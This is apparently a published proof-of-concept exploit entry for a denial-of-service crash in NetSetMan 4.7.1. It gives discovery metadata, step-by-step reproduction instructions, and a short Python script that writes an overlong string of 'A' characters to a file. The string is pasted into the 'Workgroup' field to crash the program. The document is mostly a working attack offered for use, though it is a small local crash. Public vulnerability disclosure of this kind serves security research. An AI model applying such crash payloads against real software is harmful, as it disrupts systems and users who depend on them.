#Exploit Title: NetSetMan 4.7.1 'Workgroup' - Denial of Service (PoC) #Discovery by: Victor MondragA3n #Discovery Date: 2018-02-17 #Vendor Homepage: https://www.netsetman.com/ #Software Link: https://www.netsetman.com/netsetman.exe #Tested Version: 4.7.1 #Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 #Steps to produce the crash: #1.- Run python code: NetSetMan_4.7.1.py #2.- Open netsetman.txt and copy content to clipboard #3.- Open NetSetMan #4.- Enable "Workgroup" and Paste Clipboard #5.- Click on "Activate" #6.- Crashed cod = "\x41" * 100 f = open('netsetman.txt', 'w') f.write(cod) f.close()